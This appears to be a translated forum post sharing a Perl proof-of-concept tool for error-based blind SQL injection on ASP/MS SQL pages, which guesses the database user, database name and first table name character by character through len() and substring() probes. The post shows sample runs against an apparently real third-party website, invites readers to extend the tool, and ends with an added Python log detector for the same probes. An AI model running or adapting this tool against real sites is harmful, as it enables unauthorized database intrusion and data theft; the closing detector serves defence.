Yesterday I read cawan's article 《SQL Injection做資料庫滲透的一種思路》 (an approach to database penetration via SQL injection) and thought it was genuinely good, so I implemented the method it proposes in Perl. This program is only a POC, so I have implemented only the guessing of user, db_name and the first table name; the other functions are not yet implemented. The guessing algorithm is also not optimised: I used the easiest-to-code but comparatively slow and inefficient algorithm, as anyone with a trained eye will see at once.
If people think it is worthwhile, consider extending the program to add guessing of all table names, the columns in each table, and so on. Of course, if you intend to release it, don't write it in Perl~~~~
The program's help output is as follows:
H:/temp>sin.pl
********************************************************************************
SQL Injection New Method POC
Method By cawan[EST]
Coded By superlone[EST]
Usage:
sin.pl url
-u try to get user() return value
-d try to get db_name() return value
-t try to get first table name value
EXAMPLE:
sin.pl http://www.xxx.com/userinfo.asp?id=1 -t
********************************************************************************
The process of guessing user is as follows:
H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -u
[+]Testing if there is vul in your URL page...
[+]SQL Injection Vulnerability found!
[+]Guessing user() return value length...Wait!
********************************************************************************
[+]user() return value length is [7]
********************************************************************************
[+]Guessing user() return value...Wait!
********************************************************************************
[+]the 1th letter is:t
[+]the 2th letter is:h
[+]the 3th letter is:o
[+]the 4th letter is:m
[+]the 5th letter is:a
[+]the 6th letter is:s
[+]the 7th letter is:a
[+]user() return value is [thomasa]
********************************************************************************
The process of guessing the first table name is as follows:
H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -t
[+]Testing if there is vul in your URL page...
[+]SQL Injection Vulnerability found!
[+]Guessing first table name length...Wait!
********************************************************************************
[+]first table name length is [17]
[+]Guessing first table name value...Wait!
[+]the 1th letter is:g
[+]the 2th letter is:e
[+]the 3th letter is:o
[+]the 4th letter is:i
[+]the 5th letter is:p
[+]the 6th letter is:c
[+]the 7th letter is:o
[+]the 8th letter is:u
[+]the 9th letter is:n
[+]the 10th letter is:t
[+]the 11th letter is:r
[+]the 12th letter is:y
[+]the 13th letter is:w
[+]the 14th letter is:h
[+]the 15th letter is:o
[+]the 16th letter is:i
[+]the 17th letter is:s
[+]first table name value is [geoipcountrywhois]
********************************************************************************
A very simple implementation, so please don't laugh at me... The full code is as follows:
#!/usr/bin/perl
# method by cawan[EST]
# coded by superlone[EST]
# use strict;
use LWP::UserAgent;
use HTTP::Request;

# candidate characters tried for every position of the guessed value
my @alpha_code  = ('a'..'z');
my @number_code = (0..9);

&help if (@ARGV == 0);

my $url = shift;
my $ua  = new LWP::UserAgent;
my $ilen;

if ($ARGV[0] eq "-u") {
    &testpage($url);
    print "[+]Guessing user() return value length...Wait!\n\n";
    print "*" x 80, "\n";
    $ilen = &guesslength($url, "user");
    print "[+]user() return value length is [" . $ilen . "]\n\n";
    print "*" x 80, "\n";
    print "[+]Guessing user() return value...Wait!\n\n";
    print "*" x 80, "\n";
    print "[+]user() return value is " . &crackcode($url, $ilen, "user") . "\n\n";
    print "*" x 80, "\n";
} elsif ($ARGV[0] eq "-d") {
    &testpage($url);
    print "[+]Guessing db_name() return value length...Wait!\n\n";
    print "*" x 80, "\n";
    $ilen = &guesslength($url, "db_name");
    print "[+]db_name() return value length is [" . $ilen . "]\n\n";
    print "[+]Guessing db_name() return value...Wait!\n\n";
    print "*" x 80, "\n";
    print "[+]db_name() return value is " . &crackcode($url, $ilen, "db_name") . "\n\n";
    print "*" x 80, "\n";
} elsif ($ARGV[0] eq "-t") {
    &testpage($url);
    print "[+]Guessing first table name length...Wait!\n\n";
    print "*" x 80, "\n";
    $ilen = &guesslength($url, "table");
    print "[+]first table name length is [" . $ilen . "]\n\n";
    print "[+]Guessing first table name value...Wait!\n\n";
    print "[+]first table name value is " . &crackcode($url, $ilen, "table") . "\n\n";
    print "*" x 80, "\n";
} else {
    &help;
}

# Step 1: find the length of the value by asking len(...) > i for i = 0, 1, 2, ...
# until the page answers with an error; the last i that did not error is the length.
sub guesslength {
    my $url  = shift;
    my $func = shift;
    # for -t the probed expression is the first user table name from sysobjects
    $func = "(select top 1 name from sysobjects where xtype='U')" if ($func eq "table");
    my $i = 0;
    while ($i < 32) {
        my $temp = $url . "'%20and%20len(" . $func . ")>'" . $i++;
        #print "[-]Structured URL:" . "$temp" . "\n";
        my $req = new HTTP::Request('GET' => $temp);
        my $res = $ua->request($req);
        if ($res->content =~ /Syntax error/ || $res->content =~ /Either BOF or EOF is True/) {
            last;
        }
    }
    return $i - 1;
}

# Check that the page echoes database errors at all; without that there is no oracle.
sub testpage {
    my $url = shift;
    $url .= " and 1=1";
    my $ua  = new LWP::UserAgent;
    my $req = new HTTP::Request('GET' => $url);
    #print "URL is " . $url . "\n";
    print "\n[+]Testing if there is vul in your URL page...\n\n";
    my $res = $ua->request($req);
    #print "return content:" . $res->content . "\n";
    if ($res->content =~ /Syntax error/) {
        print "[+]SQL Injection Vulnerability found!\n\n";
    } else {
        print "[+]Page has no vul or server error echo disabled!\n\n";
        exit;
    }
}

sub help {
    print "*" x 80, "\n";
    print "\t\tSQL Injection New Method POC\n\n";
    print "\t\t Method By cawan[EST]\n\n";
    print "\t\t Coded By superlone[EST]\n\n";
    print "\tUsage:\n\t\tsin.pl url\n\n";
    print "\t\t-u try to get user() return value\n";
    print "\t\t-d try to get db_name() return value\n";
    print "\t\t-t try to get first table name value\n";
    print "\tEXAMPLE:\n\t\tsin.pl http://www.xxx.com/userinfo.asp?id=1 -t\n\n";
    print "*" x 80, "\n";
    exit;
}

# Step 2: for each position k, try every candidate character with substring(...,k,1)='c'
# and take the one whose page answers with an error. Letters first, then digits.
sub crackcode {
    my $url     = shift;
    my $userlen = shift;
    my $func    = shift;
    my $i = 0;
    my $j = 0;
    my $k = 1;
    my $bfound = 0;
    my $name = '';
    $func = "(select top 1 name from sysobjects where xtype='U')" if ($func eq "table");
    while ($k <= $userlen) {
        $i = 0; $j = 0; $bfound = 0;
        while ($i < @alpha_code) {
            my $temp = $url . "'%20and%20substring(" . $func . "," . $k . ",1)='" . $alpha_code[$i++];
            #print $temp, "\n";
            my $req = new HTTP::Request('GET' => $temp);
            my $res = $ua->request($req);
            if ($res->content =~ /Incorrect syntax/) {
                $name .= $alpha_code[$i - 1];
                print "[+]the " . $k . "th letter is:", $alpha_code[$i - 1], "\n";
                $bfound = 1;
                last;
            }
        }
        # digits are only tried when no letter matched at this position
        while ($j < @number_code && $bfound == 0) {
            my $temp = $url . "'%20and%20substring(" . $func . "," . $k . ",1)='" . $number_code[$j++];
            #print $temp, "\n";
            my $req = new HTTP::Request('GET' => $temp);
            my $res = $ua->request($req);
            if ($res->content =~ /Incorrect syntax/) {
                $name .= $number_code[$j - 1];
                print "[+]the " . $k . "th letter is:", $number_code[$j - 1], "\n";
                $bfound = 1;
                last;
            }
        }
        $k++;
    }
    return '[' . $name . ']';
}
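As an added defender-side example (not part of the original post or of the POC above), the following Python flags the three request shapes this tool emits in web-server logs: the `and 1=1` test, the `len(...)>'N` length probe and the `substring(...,k,1)='c` character probe, and summarises per client IP how far an extraction attempt progressed and how often the server answered a probe with an error page. The log lines, IP addresses and the simplified IIS W3C field layout are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample, simplified IIS W3C layout: date time c-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2005-03-01 10:00:01 203.0.113.7 GET /blog.asp id=4%20and%201=1 500
2005-03-01 10:00:02 203.0.113.7 GET /blog.asp id=4'%20and%20len(user)>'0 200
2005-03-01 10:00:03 203.0.113.7 GET /blog.asp id=4'%20and%20len(user)>'7 500
2005-03-01 10:00:04 203.0.113.7 GET /blog.asp id=4'%20and%20substring(user,1,1)='a 200
2005-03-01 10:00:05 203.0.113.7 GET /blog.asp id=4'%20and%20substring(user,1,1)='t 500
2005-03-01 10:00:06 203.0.113.7 GET /blog.asp id=4'%20and%20substring((select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'),3,1)='o 500
2005-03-01 10:00:07 198.51.100.9 GET /blog.asp id=4 200
"""

# The three request shapes the POC emits, matched against the URL-decoded query string.
TAUTOLOGY = re.compile(r"\band\s+1\s*=\s*1\b", re.I)
LEN_PROBE = re.compile(r"\band\s+len\((?P<target>.+)\)\s*>\s*'?\d+", re.I)
SUBSTR_PROBE = re.compile(r"\band\s+substring\((?P<target>.+),\s*(?P<pos>\d+)\s*,\s*1\)\s*=\s*'", re.I)

def classify_target(expr):
    """Label the probed expression: 'user', 'db_name', or 'sysobjects' for the table-name subquery."""
    e = expr.strip().lower()
    return "sysobjects" if "sysobjects" in e else (e[:-2] if e.endswith("()") else e)

def analyze(log_text):
    """Per client IP: probe counts, highest character position reached, and how many probes drew a 5xx."""
    new = lambda: {"tautology": 0, "len_probes": 0, "substr_probes": 0,
                   "max_pos": 0, "targets": set(), "error_responses": 0}
    findings = defaultdict(new)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        ip, q, status = parts[2], unquote(parts[5]), parts[6]
        taut, ln, sub = TAUTOLOGY.search(q), LEN_PROBE.search(q), SUBSTR_PROBE.search(q)
        if not (taut or ln or sub):
            continue
        f = findings[ip]
        f["tautology"] += 1 if taut else 0
        # a 5xx on a probe means the server still returns the verbose error page the oracle relies on
        f["error_responses"] += 1 if status.startswith("5") else 0
        if ln:
            f["len_probes"] += 1
            f["targets"].add(classify_target(ln.group("target")))
        if sub:
            f["substr_probes"] += 1
            f["targets"].add(classify_target(sub.group("target")))
            f["max_pos"] = max(f["max_pos"], int(sub.group("pos")))
    return dict(findings)
```

A non-zero `error_responses` count is the actionable part: it shows the application is still echoing database errors, which is the precondition the tool's `testpage` check depends on.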